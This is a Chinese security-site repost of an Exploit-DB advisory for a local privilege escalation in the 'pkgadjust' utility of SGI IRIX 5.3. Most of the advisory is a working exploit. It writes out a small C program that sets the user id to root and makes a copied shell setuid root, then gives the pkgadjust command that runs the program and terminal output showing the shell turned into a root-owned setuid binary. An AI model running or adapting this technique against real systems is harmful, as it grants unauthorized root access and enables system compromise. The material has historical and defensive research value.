SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalation

admin
admin
admin
103439
文章
87
评论
2021年4月8日17:58:38SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalation已关闭评论42 views字数 835阅读2分47秒阅读模式

SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalation

漏洞ID 1053343 漏洞类型
发布时间 1996-09-23 更新时间 1996-09-23
SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalation CVE编号 N/A
 		SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalation CNNVD-ID N/A
漏洞平台 IRIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19319
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/419/info

A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. 

% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database

updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh

相关推荐: HP Remote Watch权限许可和访问控制漏洞

HP Remote Watch权限许可和访问控制漏洞 漏洞ID 1207634 漏洞类型 未知 发布时间 1996-10-01 更新时间 1996-10-01 CVE编号 CVE-1999-0246 CNNVD-ID CNNVD-199610-002 漏洞平台…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月8日17:58:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SGI IRIX 5.3 - 'pkgadjust' Local Privilege Escalationhttp://cn-sec.com/archives/329798.html